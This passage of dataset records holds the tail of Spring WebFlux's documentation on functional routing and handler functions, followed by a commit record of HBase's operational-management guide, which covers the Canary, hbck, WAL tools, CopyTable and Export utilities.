`RouterFunction` is\nthe equivalent of an `@RequestMapping` annotation.\n\n`RouterFunctions.route(RequestPredicate, HandlerFunction)` provides a router function\ndefault implementation that can be used with a number of built-in request predicates.\nFor example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.RequestPredicates.*;\nimport static org.springframework.web.reactive.function.server.RouterFunctions.route;\n\nPersonRepository repository = ...\nPersonHandler handler = new PersonHandler(repository);\n\nRouterFunction<ServerResponse> route =\n\troute(GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON)), handler::getPerson)\n\t\t.andRoute(GET(\"\/person\").and(accept(APPLICATION_JSON)), handler::listPeople)\n\t\t.andRoute(POST(\"\/person\"), handler::createPerson);\n\n\npublic class PersonHandler {\n\n\t\/\/ ...\n\n\tpublic Mono<ServerResponse> listPeople(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n\n\tpublic Mono<ServerResponse> createPerson(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n\n\tpublic Mono<ServerResponse> getPerson(ServerRequest request) {\n\t\t\/\/ ...\n\t}\n}\n----\n\nOne way to run a `RouterFunction` is to turn it into an `HttpHandler` and install it\nthrough one of the built-in <<web-reactive.adoc#webflux-httphandler,server adapters>>:\n\n* `RouterFunctions.toHttpHandler(RouterFunction)`\n* `RouterFunctions.toHttpHandler(RouterFunction, HandlerStrategies)`\n\n\nMost applications will run through the WebFlux Java config, see <<webflux-fn-running>>.\n\n\n\n\n[[webflux-fn-handler-functions]]\n== HandlerFunction\n\n`ServerRequest` and `ServerResponse` are immutable interfaces that offer JDK-8 friendly\naccess to the HTTP request and response with\nhttp:\/\/www.reactive-streams.org[Reactive Streams] back pressure against the request\nand response body stream. The request body is represented with a Reactor `Flux` or `Mono`.\nThe response body is represented with any Reactive Streams `Publisher`, including `Flux`\nand `Mono`. For more on that see\n<<web-reactive.adoc#webflux-reactive-libraries,Reactive Libraries>>.\n\n\n\n[[webflux-fn-request]]\n=== ServerRequest\n\n`ServerRequest` provides access to the HTTP method, URI, headers, and query parameters\nwhile access to the body is provided through the `body` methods.\n\nTo extract the request body to a `Mono<String>`:\n\n Mono<String> string = request.bodyToMono(String.class);\n\nTo extract the body to a `Flux<Person>`, where `Person` objects are decoded from some\nserialized form, such as JSON or XML:\n\n Flux<Person> people = request.bodyToFlux(Person.class);\n\nThe above are shortcuts that use the more general `ServerRequest.body(BodyExtractor)`\nwhich accepts the `BodyExtractor` functional, strategy interface. The utility class\n`BodyExtractors` provides access to a number of instances. 
For example, the above can\nalso be written as follows:\n\n Mono<String> string = request.body(BodyExtractors.toMono(String.class));\n Flux<Person> people = request.body(BodyExtractors.toFlux(Person.class));\n\nTo access form data:\n\n Mono<MultiValueMap<String, String> map = request.body(BodyExtractors.toFormData());\n\nTo access multipart data as a map:\n\n Mono<MultiValueMap<String, Part> map = request.body(BodyExtractors.toMultipartData());\n\nTo access multiparts, one at a time, in streaming fashion:\n\n Flux<Part> parts = request.body(BodyExtractos.toParts());\n\n\n\n[[webflux-fn-response]]\n=== ServerResponse\n\n`ServerResponse` provides access to the HTTP response and since it is immutable, you use\na build to create it. The builder can be used to set the response status, to add response\nheaders, or to provide a body. Below is an example with a 200 (OK) response with JSON\ncontent:\n\n Mono<Person> person = ...\n ServerResponse.ok().contentType(MediaType.APPLICATION_JSON).body(person, Person.class);\n\nThis is how to build a 201 (CREATED) response with `\"Location\"` header, and no body:\n\n URI location = ...\n ServerResponse.created(location).build();\n\n\n\n[[webflux-fn-handler-classes]]\n=== Handler Classes\n\nWe can write a handler function as a lambda. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nHandlerFunction<ServerResponse> helloWorld =\n request -> ServerResponse.ok().body(fromObject(\"Hello World\"));\n----\n\nThat is convenient but in an application we need multiple functions and useful to group\nrelated handler functions together into a handler (like an `@Controller`). For example,\nhere is a class that exposes a reactive `Person` repository:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.ServerResponse.ok;\nimport static org.springframework.web.reactive.function.BodyInserters.fromObject;\n\npublic class PersonHandler {\n\n\tprivate final PersonRepository repository;\n\n\tpublic PersonHandler(PersonRepository repository) {\n\t\tthis.repository = repository;\n\t}\n\n\tpublic Mono<ServerResponse> listPeople(ServerRequest request) { \/\/ <1>\n\t\tFlux<Person> people = repository.allPeople();\n\t\treturn ok().contentType(APPLICATION_JSON).body(people, Person.class);\n\t}\n\n\tpublic Mono<ServerResponse> createPerson(ServerRequest request) { \/\/ <2>\n\t\tMono<Person> person = request.bodyToMono(Person.class);\n\t\treturn ok().build(repository.savePerson(person));\n\t}\n\n\tpublic Mono<ServerResponse> getPerson(ServerRequest request) { \/\/ <3>\n\t\tint personId = Integer.valueOf(request.pathVariable(\"id\"));\n\t\treturn repository.getPerson(personId)\n\t\t\t.flatMap(person -> ok().contentType(APPLICATION_JSON).body(fromObject(person)))\n\t\t\t.switchIfEmpty(ServerResponse.notFound().build());\n\t}\n}\n----\n<1> `listPeople` is a handler function that returns all `Person` objects found in the repository as\nJSON.\n<2> `createPerson` is a handler function that stores a new `Person` contained in the request body.\nNote that `PersonRepository.savePerson(Person)` returns `Mono<Void>`: an empty Mono that emits\na completion signal when the person has been read from the request and stored. 
So we use the\n`build(Publisher<Void>)` method to send a response when that completion signal is received, i.e.\nwhen the `Person` has been saved.\n<3> `getPerson` is a handler function that returns a single person, identified via the path\nvariable `id`. We retrieve that `Person` via the repository, and create a JSON response if it is\nfound. If it is not found, we use `switchIfEmpty(Mono<T>)` to return a 404 Not Found response.\n\n\n\n\n[[webflux-fn-router-functions]]\n== RouterFunction\n\n`RouterFunction` is used to route requests to a `HandlerFunction`. Typically, you do not\nwrite router functions yourself, but rather use\n`RouterFunctions.route(RequestPredicate, HandlerFunction)`. If the predicate applies, the\nrequest is routed to the given `HandlerFunction`, or otherwise no routing is performed,\nand that would translate to a 404 (Not Found) response.\n\n\n\n[[webflux-fn-predicates]]\n=== Predicates\n\nYou can write your own `RequestPredicate`, but the `RequestPredicates` utility class\noffers commonly implementations, based on the request path, HTTP method, content-type,\nand so on. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nRouterFunction<ServerResponse> route =\n\tRouterFunctions.route(RequestPredicates.path(\"\/hello-world\"),\n\trequest -> Response.ok().body(fromObject(\"Hello World\")));\n----\n\nYou can compose multiple request predicates together via:\n\n* `RequestPredicate.and(RequestPredicate)` -- both must match.\n* `RequestPredicate.or(RequestPredicate)` -- either may match.\n\nMany of the predicates from `RequestPredicates` are composed. For example\n`RequestPredicates.GET(String)` is composed from `RequestPredicates.method(HttpMethod)`\nand `RequestPredicates.path(String)`.\n\nYou can compose multiple router functions into one, such that they're evaluated in order,\nand if the first route doesn't match, the second is evaluated. You can declare more\nspecific routes before more general ones.\n\n\n\n[[webflux-fn-routes]]\n=== Routes\n\nYou can compose multiple router functions together via:\n\n* `RouterFunction.and(RouterFunction)`\n* `RouterFunction.andRoute(RequestPredicate, HandlerFunction)` -- shortcut for\n`RouterFunction.and()` with nested `RouterFunctions.route()`.\n\nUsing composed routes and predicates, we can then declare the following routes, referring\nto methods in the `PersonHandler`, shown in <<webflux-fn-handler-class>>, through\nhttps:\/\/docs.oracle.com\/javase\/tutorial\/java\/javaOO\/methodreferences.html[method-references]:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.MediaType.APPLICATION_JSON;\nimport static org.springframework.web.reactive.function.server.RequestPredicates.*;\n\nPersonRepository repository = ...\nPersonHandler handler = new PersonHandler(repository);\n\nRouterFunction<ServerResponse> personRoute =\n\troute(GET(\"\/person\/{id}\").and(accept(APPLICATION_JSON)), handler::getPerson)\n\t\t.andRoute(GET(\"\/person\").and(accept(APPLICATION_JSON)), handler::listPeople)\n\t\t.andRoute(POST(\"\/person\"), handler::createPerson);\n----\n\n\n\n\n\n[[webflux-fn-running]]\n== Running a server\n\nHow do you run a router function in an HTTP server? 
A simple option is to convert a router\nfunction to an `HttpHandler` using one of the following:\n\n* `RouterFunctions.toHttpHandler(RouterFunction)`\n* `RouterFunctions.toHttpHandler(RouterFunction, HandlerStrategies)`\n\nThe returned `HttpHandler` can then be used with a number of servers adapters by following\n<<web-reactive.adoc#webflux-httphandler,HttpHandler>> for server-specific instructions.\n\nA more advanced option is to run with a\n<<web-reactive.adoc#webflux-dispatcher-handler,DispatcherHandler>>-based setup through the\n<<web-reactive.adoc#webflux-config>> which uses Spring configuration to declare the\ncomponents quired to process requests. The WebFlux Java config declares the following\ninfrastructure components to support functional endpoints:\n\n* `RouterFunctionMapping` -- detects one or more `RouterFunction<?>` beans in the Spring\nconfiguration, combines them via `RouterFunction.andOther`, and routes requests to the\nresulting composed `RouterFunction`.\n* `HandlerFunctionAdapter` -- simple adapter that allows the `DispatcherHandler` to invoke\na `HandlerFunction` that was mapped to a request.\n* `ServerResponseResultHandler` -- handles the result from the invocation of a\n`HandlerFunction` by invoking the `writeTo` method of the `ServerResponse`.\n\nThe above components allow functional endpoints to fit within the `DispatcherHandler` request\nprocessing lifecycle, and also potentially run side by side with annotated controllers, if\nany are declared. It is also how functional endpoints are enabled the Spring Boot WebFlux\nstarter.\n\nBelow is example WebFlux Java config (see\n<<web-reactive.adoc#webflux-dispatcher-handler,DispatcherHandler>> for how to run):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Configuration\n@EnableWebFlux\npublic class WebConfig implements WebFluxConfigurer {\n\n\t@Bean\n\tpublic RouterFunction<?> routerFunctionA() {\n\t\t\/\/ ...\n\t}\n\n\t@Bean\n\tpublic RouterFunction<?> routerFunctionB() {\n\t\t\/\/ ...\n\t}\n\n\t\/\/ ...\n\n\t@Override\n\tpublic void configureHttpMessageCodecs(ServerCodecConfigurer configurer) {\n\t\t\/\/ configure message conversion...\n\t}\n\n\t@Override\n\tdefault void addCorsMappings(CorsRegistry registry) {\n\t\t\/\/ configure CORS...\n\t}\n\n\t@Override\n\tpublic void configureViewResolvers(ViewResolverRegistry registry) {\n\t\t\/\/ configure view resolution for HTML rendering...\n\t}\n}\n----\n\n\n\n\n[[webflux-fn-handler-filter-function]]\n== HandlerFilterFunction\n\nRoutes mapped by a router function can be filtered by calling\n`RouterFunction.filter(HandlerFilterFunction)`, where `HandlerFilterFunction` is essentially a\nfunction that takes a `ServerRequest` and `HandlerFunction`, and returns a `ServerResponse`.\nThe handler function parameter represents the next element in the chain: this is typically the\n`HandlerFunction` that is routed to, but can also be another `FilterFunction` if multiple filters\nare applied.\nWith annotations, similar functionality can be achieved using `@ControllerAdvice` and\/or a `ServletFilter`.\nLet's add a simple security filter to our route, assuming that we have a `SecurityManager` that\ncan determine whether a particular path is allowed:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\nimport static org.springframework.http.HttpStatus.UNAUTHORIZED;\n\nSecurityManager securityManager = ...\nRouterFunction<ServerResponse> route = ...\n\nRouterFunction<ServerResponse> filteredRoute =\n\troute.filter((request, next) -> {\n\t\tif 
(securityManager.allowAccessTo(request.path())) {\n\t\t\treturn next.handle(request);\n\t\t}\n\t\telse {\n\t\t\treturn ServerResponse.status(UNAUTHORIZED).build();\n\t\t}\n });\n----\n\nYou can see in this example that invoking the `next.handle(ServerRequest)` is optional: we only\nallow the handler function to be executed when access is allowed.\n\n[NOTE]\n====\nCORS support for functional endpoints is provided via a dedicated <<webflux-cors-webfilter,`CorsWebFilter`>>.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a6409a30aa634875467683203de0e21e0491986","subject":"HBASE-17918 document serial replication","message":"HBASE-17918 document serial replication\n\nSigned-off-by: zhangduo <ca823f7b4f21a31b6ef7892c1f90d53103f0d135@apache.org>\n","repos":"ChinmaySKulkarni\/hbase,ultratendency\/hbase,ultratendency\/hbase,mahak\/hbase,Eshcar\/hbase,ndimiduk\/hbase,ultratendency\/hbase,mahak\/hbase,Eshcar\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,Apache9\/hbase,apurtell\/hbase,Eshcar\/hbase,Eshcar\/hbase,mahak\/hbase,Apache9\/hbase,ndimiduk\/hbase,ultratendency\/hbase,apurtell\/hbase,apurtell\/hbase,bijugs\/hbase,francisliu\/hbase,apurtell\/hbase,apurtell\/hbase,francisliu\/hbase,ChinmaySKulkarni\/hbase,francisliu\/hbase,ndimiduk\/hbase,Eshcar\/hbase,ndimiduk\/hbase,Apache9\/hbase,francisliu\/hbase,ndimiduk\/hbase,mahak\/hbase,mahak\/hbase,mahak\/hbase,ultratendency\/hbase,Apache9\/hbase,francisliu\/hbase,Eshcar\/hbase,Apache9\/hbase,ndimiduk\/hbase,francisliu\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,apurtell\/hbase,bijugs\/hbase,mahak\/hbase,ndimiduk\/hbase,apurtell\/hbase,Apache9\/hbase,ndimiduk\/hbase,Eshcar\/hbase,apurtell\/hbase,apurtell\/hbase,ChinmaySKulkarni\/hbase,francisliu\/hbase,Apache9\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,mahak\/hbase,ndimiduk\/hbase,bijugs\/hbase,francisliu\/hbase,bijugs\/hbase,francisliu\/hbase,bijugs\/hbase,mahak\/hbase,mahak\/hbase,francisliu\/hbase,Apache9\/hbase,ultratendency\/hbase,Apache9\/hbase,Eshcar\/hbase,apurtell\/hbase,ultratendency\/hbase,ChinmaySKulkarni\/hbase,Apache9\/hbase,ndimiduk\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/ops_mgt.adoc","new_file":"src\/main\/asciidoc\/_chapters\/ops_mgt.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. 
You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[ops_mgt]]\n= Apache HBase Operational Management\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nThis chapter covers operational tools and practices required of a running Apache HBase cluster.\nThe subject of operations is related to the topics of <<trouble>>, <<performance>>, and <<configuration>> but is a distinct topic in itself.\n\n[[tools]]\n== HBase Tools and Utilities\n\nHBase provides several tools for administration, analysis, and debugging of your cluster.\nThe entry-point to most of these tools is the _bin\/hbase_ command, though some tools are available in the _dev-support\/_ directory.\n\nTo see usage instructions for the _bin\/hbase_ command, run it with no arguments, or with the `-h` argument.\nThese are the usage instructions for HBase 0.98.x.\nSome commands, such as `version`, `pe`, `ltt`, `clean`, are not available in previous versions.\n\n----\n$ bin\/hbase\nUsage: hbase [<options>] <command> [<args>]\nOptions:\n --config DIR Configuration direction to use. Default: .\/conf\n --hosts HOSTS Override the list in 'regionservers' file\n\nCommands:\nSome commands take arguments. Pass no args or -h for usage.\n shell Run the HBase shell\n hbck Run the hbase 'fsck' tool\n wal Write-ahead-log analyzer\n hfile Store file analyzer\n zkcli Run the ZooKeeper shell\n upgrade Upgrade hbase\n master Run an HBase HMaster node\n regionserver Run an HBase HRegionServer node\n zookeeper Run a ZooKeeper server\n rest Run an HBase REST server\n thrift Run the HBase Thrift server\n thrift2 Run the HBase Thrift2 server\n clean Run the HBase clean up script\n classpath Dump hbase CLASSPATH\n mapredcp Dump CLASSPATH entries required by mapreduce\n pe Run PerformanceEvaluation\n ltt Run LoadTestTool\n version Print the version\n CLASSNAME Run the class named CLASSNAME\n----\n\nSome of the tools and utilities below are Java classes which are passed directly to the _bin\/hbase_ command, as referred to in the last line of the usage instructions.\nOthers, such as `hbase shell` (<<shell>>), `hbase upgrade` (<<upgrading>>), and `hbase thrift` (<<thrift>>), are documented elsewhere in this guide.\n\n=== Canary\n\nThe Canary class can help users canary-test the HBase cluster status, at the granularity of every column family of every region, or at RegionServer granularity.\nTo see the usage, use the `--help` parameter.\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary -help\n\nUsage: bin\/hbase org.apache.hadoop.hbase.tool.Canary [opts] [table1 [table2]...] 
| [regionserver1 [regionserver2]..]\n where [opts] are:\n -help Show this help and exit.\n -regionserver replace the table argument to regionserver,\n which means to enable regionserver mode\n -daemon Continuous check at defined intervals.\n -interval <N> Interval between checks (sec)\n -e Use region\/regionserver as regular expression\n which means the region\/regionserver is regular expression pattern\n -f <B> stop whole program if first error occurs, default is true\n -t <N> timeout for a check, default is 600000 (milliseconds)\n -writeSniffing enable the write sniffing in canary\n -treatFailureAsError treats read \/ write failure as error\n -writeTable The table used for write sniffing. Default is hbase:canary\n -D<configProperty>=<value> assigning or override the configuration params\n----\n\nThis tool returns non-zero error codes to the user so that it can be integrated with other monitoring tools, such as Nagios.\nThe error code definitions are:\n\n[source,java]\n----\nprivate static final int USAGE_EXIT_CODE = 1;\nprivate static final int INIT_ERROR_EXIT_CODE = 2;\nprivate static final int TIMEOUT_ERROR_EXIT_CODE = 3;\nprivate static final int ERROR_EXIT_CODE = 4;\n----\n\nThe examples below are based on the following scenario: there are two tables, test-01 and test-02, each with two column families, cf1 and cf2, deployed on 3 RegionServers, as shown in the following table.\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| RegionServer\n| test-01\n| test-02\n| rs1 | r1 | r2\n| rs2 | r2 |\n| rs3 | r2 | r1\n|===\n\n==== Canary test for every column family (store) of every region of every table\n\n----\n$ ${HBASE_HOME}\/bin\/hbase canary\n\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf1 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,,1386230156732.0e3c7d77ffb6361ea1b996ac1042ca9a. column family cf2 in 2ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf1 in 4ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-01,0004883,1386230156732.87b55e03dfeade00f441125159f8ca87. column family cf2 in 1ms\n...\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf1 in 5ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,,1386559511167.aa2951a86289281beee480f107bb36ee. column family cf2 in 3ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. column family cf1 in 31ms\n13\/12\/09 03:26:32 INFO tool.Canary: read from region test-02,0004883,1386559511167.cbda32d5e2e276520712d84eaaa29d84. 
As you can see, table test-01 has two regions and two column families, so the Canary tool picks 4 small pieces of data from 4 (2 regions * 2 stores) different stores.
This is the default behavior of the tool.

==== Canary test for every column family (store) of every region of specific table(s)

You can also test one or more specific tables.

----
$ ${HBASE_HOME}/bin/hbase canary test-01 test-02
----

==== Canary test with RegionServer granularity

This mode picks one small piece of data from each RegionServer.
You can also pass RegionServer names as input options to canary-test specific RegionServers.

----
$ ${HBASE_HOME}/bin/hbase canary -regionserver

13/12/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs2 in 72ms
13/12/09 06:05:17 INFO tool.Canary: Read from table:test-02 on region server:rs3 in 34ms
13/12/09 06:05:17 INFO tool.Canary: Read from table:test-01 on region server:rs1 in 56ms
----

==== Canary test with regular expression pattern

This will test both table test-01 and test-02.

----
$ ${HBASE_HOME}/bin/hbase canary -e test-0[1-2]
----

==== Run canary test as daemon mode

This runs the check repeatedly at the interval defined by the `-interval` option, whose default value is 6 seconds.
The daemon stops itself and returns a non-zero error code if any error occurs, because the default value of the `-f` option is true.

----
$ ${HBASE_HOME}/bin/hbase canary -daemon
----

To run repeatedly with a 5-second interval and not stop even if errors occur in the test:

----
$ ${HBASE_HOME}/bin/hbase canary -daemon -interval 5 -f false
----

==== Force timeout if canary test stuck

In some cases the request is stuck and no response is sent back to the client. This can happen with dead RegionServers which the master has not yet noticed.
Because of this we provide a timeout option to kill the canary test and return a non-zero error code.
This run sets the timeout value to 60 seconds (60000 milliseconds); the default value is 600 seconds.

----
$ ${HBASE_HOME}/bin/hbase canary -t 60000
----

==== Enable write sniffing in canary

By default, the canary tool only checks read operations, so it is hard to find problems in the write path.
To enable write sniffing, run the canary with the `-writeSniffing` option.
When write sniffing is enabled, the canary tool creates an HBase table and makes sure the regions of the table are distributed across all region servers.
In each sniffing period, the canary tries to put data to these regions to check the write availability of each region server.
----
$ ${HBASE_HOME}/bin/hbase canary -writeSniffing
----

The default write table is `hbase:canary` and can be specified by the option `-writeTable`.
----
$ ${HBASE_HOME}/bin/hbase canary -writeSniffing -writeTable ns:canary
----

The default value size of each put is 10 bytes and you can set it by the config key:
`hbase.canary.write.value.size`.

==== Treat read / write failure as error

By default, the canary tool only logs read failures, for example due to RetriesExhaustedException, while returning a normal exit code.
To treat read / write failures as errors, run the canary with the `-treatFailureAsError` option.
When enabled, a read / write failure results in an error exit code.
----
$ ${HBASE_HOME}/bin/hbase canary -treatFailureAsError
----
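Because the canary exits with the well-defined codes shown earlier, it is easy to wire into an external monitor. The following is a minimal sketch of a Nagios-style wrapper; the table names, timeout, and severity mapping are illustrative, not prescriptive.

----
#!/usr/bin/env bash
# Illustrative wrapper mapping canary exit codes to Nagios-style states.
# Exit codes per the Canary source shown above: 1=usage, 2=init error,
# 3=timeout, 4=error.
"${HBASE_HOME}/bin/hbase" canary -t 60000 test-01 test-02
rc=$?
case "$rc" in
  0) echo "OK - canary reads succeeded"; exit 0 ;;
  3) echo "WARNING - canary timed out"; exit 1 ;;
  *) echo "CRITICAL - canary failed (exit code $rc)"; exit 2 ;;
esac
----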
==== Running Canary in a Kerberos-enabled Cluster

To run Canary in a Kerberos-enabled cluster, configure the following two properties in _hbase-site.xml_:

* `hbase.client.keytab.file`
* `hbase.client.kerberos.principal`

Kerberos credentials are refreshed every 30 seconds when Canary runs in daemon mode.

To configure the DNS interface for the client, configure the following optional properties in _hbase-site.xml_.

* `hbase.client.dns.interface`
* `hbase.client.dns.nameserver`

.Canary in a Kerberos-Enabled Cluster
====
This example shows each of the properties with valid values.

[source,xml]
----
<property>
  <name>hbase.client.kerberos.principal</name>
  <value>hbase/_HOST@YOUR-REALM.COM</value>
</property>
<property>
  <name>hbase.client.keytab.file</name>
  <value>/etc/hbase/conf/keytab.krb5</value>
</property>
<!-- optional params -->
<property>
  <name>hbase.client.dns.interface</name>
  <value>default</value>
</property>
<property>
  <name>hbase.client.dns.nameserver</name>
  <value>default</value>
</property>
----
====

[[health.check]]
=== Health Checker

You can configure HBase to run a script periodically, and if it fails N times (configurable), have the server exit.
See _HBASE-7351 Periodic health check script_ for configurations and detail.

=== Driver

Several frequently-accessed utilities are provided as `Driver` classes, and executed by the _bin/hbase_ command.
These utilities represent MapReduce jobs which run on your cluster.
They are run in the following way, replacing _UtilityName_ with the utility you want to run.
This command assumes you have set the environment variable `HBASE_HOME` to the directory where HBase is unpacked on your server.

----
${HBASE_HOME}/bin/hbase org.apache.hadoop.hbase.mapreduce.UtilityName
----

The following utilities are available:

`LoadIncrementalHFiles`::
  Complete a bulk data load.

`CopyTable`::
  Export a table from the local cluster to a peer cluster.

`Export`::
  Write table data to HDFS.

`Import`::
  Import data written by a previous `Export` operation.

`ImportTsv`::
  Import data in TSV format.

`RowCounter`::
  Count rows in an HBase table.

`CellCounter`::
  Count cells in an HBase table.

`replication.VerifyReplication`::
  Compare the data from tables in two different clusters.
  WARNING: It doesn't work for incrementColumnValues'd cells since the timestamp is changed.
  Note that this command is in a different package than the others.

Each command except `RowCounter` and `CellCounter` accepts a single `--help` argument to print usage instructions.

[[hbck]]
=== HBase `hbck`

To run `hbck` against your HBase cluster, run `$ ./bin/hbase hbck`. At the end of the command's output it prints `OK` or `INCONSISTENCY`.
If your cluster reports inconsistencies, pass `-details` to see more detail emitted.
If inconsistencies are reported, run `hbck` a few times, because an inconsistency may be transient (e.g. the cluster is starting up or a region is splitting).
Passing `-fix` may correct the inconsistency (this is an experimental feature).
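For example, a quick scripted check might re-run `hbck` with details only when the summary is not `OK`. This is a sketch, assuming the summary wording described above:

----
# Illustrative: emit details only when hbck reports an inconsistency
$ ./bin/hbase hbck | grep -q INCONSISTENCY && ./bin/hbase hbck -details
----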
For more information, see <<hbck.in.depth>>.

[[hfile_tool2]]
=== HFile Tool

See <<hfile_tool>>.

=== WAL Tools

[[hlog_tool]]
==== FSHLog tool

The main method on `FSHLog` offers manual split and dump facilities.
Pass it WALs or the product of a split, the content of the _recovered.edits_ directory.

You can get a textual dump of a WAL file content by doing the following:

----
 $ ./bin/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --dump hdfs://example.org:8020/hbase/.logs/example.org,60020,1283516293161/10.10.21.10%3A60020.1283973724012
----

The return code will be non-zero if there are any issues with the file, so you can test the health of the file by redirecting `STDOUT` to `/dev/null` and testing the program return.

Similarly you can force a split of a log file directory by doing:

----
 $ ./bin/hbase org.apache.hadoop.hbase.regionserver.wal.FSHLog --split hdfs://example.org:8020/hbase/.logs/example.org,60020,1283516293161/
----

[[hlog_tool.prettyprint]]
===== WALPrettyPrinter

The `WALPrettyPrinter` is a tool with configurable options to print the contents of a WAL.
You can invoke it via the HBase cli with the 'wal' command.

----
 $ ./bin/hbase wal hdfs://example.org:8020/hbase/.logs/example.org,60020,1283516293161/10.10.21.10%3A60020.1283973724012
----

.WAL Printing in older versions of HBase
[NOTE]
====
Prior to version 2.0, the `WALPrettyPrinter` was called the `HLogPrettyPrinter`, after an internal name for HBase's write ahead log.
In those versions, you can print the contents of a WAL using the same configuration as above, but with the 'hlog' command.

----
 $ ./bin/hbase hlog hdfs://example.org:8020/hbase/.logs/example.org,60020,1283516293161/10.10.21.10%3A60020.1283973724012
----
====

[[compression.tool]]
=== Compression Tool

See <<compression.test,compression.test>>.

[[copy.table]]
=== CopyTable

CopyTable is a utility that can copy part or all of a table, either to the same cluster or another cluster.
The target table must first exist.
The usage is as follows:

----
$ ./bin/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --help
Usage: CopyTable [general options] [--starttime=X] [--endtime=Y] [--new.name=NEW] [--peer.adr=ADR] <tablename>

Options:
 rs.class     hbase.regionserver.class of the peer cluster,
              specify if different from current cluster
 rs.impl      hbase.regionserver.impl of the peer cluster,
 startrow     the start row
 stoprow      the stop row
 starttime    beginning of the time range (unixtime in millis)
              without endtime means from starttime to forever
 endtime      end of the time range.
Ignored if no starttime specified.\n versions number of cell versions to copy\n new.name new table's name\n peer.adr Address of the peer cluster given in the format\n hbase.zookeeer.quorum:hbase.zookeeper.client.port:zookeeper.znode.parent\n families comma-separated list of families to copy\n To copy from cf1 to cf2, give sourceCfName:destCfName.\n To keep the same name, just give \"cfName\"\n all.cells also copy delete markers and deleted cells\n\nArgs:\n tablename Name of the table to copy\n\nExamples:\n To copy 'TestTable' to a cluster that uses replication for a 1 hour window:\n $ bin\/hbase org.apache.hadoop.hbase.mapreduce.CopyTable --starttime=1265875194289 --endtime=1265878794289 --peer.adr=server1,server2,server3:2181:\/hbase --families=myOldCf:myNewCf,cf2,cf3 TestTable\n\nFor performance consider the following general options:\n It is recommended that you set the following to >=100. A higher value uses more memory but\n decreases the round trip time to the server and may increase performance.\n -Dhbase.client.scanner.caching=100\n The following should always be set to false, to prevent writing data twice, which may produce\n inaccurate results.\n -Dmapred.map.tasks.speculative.execution=false\n----\n\n.Scanner Caching\n[NOTE]\n====\nCaching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.\n====\n\n.Versions\n[NOTE]\n====\nBy default, CopyTable utility only copies the latest version of row cells unless `--versions=n` is explicitly specified in the command.\n====\n\nSee Jonathan Hsieh's link:https:\/\/blog.cloudera.com\/blog\/2012\/06\/online-hbase-backups-with-copytable-2\/[Online\n HBase Backups with CopyTable] blog post for more on `CopyTable`.\n\n[[export]]\n=== Export\n\nExport is a utility that will dump the contents of table to HDFS in a sequence file.\nThe Export can be run via a Coprocessor Endpoint or MapReduce. Invoke via:\n\n*mapreduce-based Export*\n----\n$ bin\/hbase org.apache.hadoop.hbase.mapreduce.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\n*endpoint-based Export*\n----\n$ bin\/hbase org.apache.hadoop.hbase.coprocessor.Export <tablename> <outputdir> [<versions> [<starttime> [<endtime>]]]\n----\n\n*The Comparison of Endpoint-based Export And Mapreduce-based Export*\n|===\n||Endpoint-based Export|Mapreduce-based Export\n\n|HBase version requirement\n|2.0+\n|0.2.1+\n\n|Maven dependency\n|hbase-endpoint\n|hbase-mapreduce (2.0+), hbase-server(prior to 2.0)\n\n|Requirement before dump\n|mount the endpoint.Export on the target table\n|deploy the MapReduce framework\n\n|Read latency\n|low, directly read the data from region\n|normal, traditional RPC scan\n\n|Read Scalability\n|depend on number of regions\n|depend on number of mappers (see 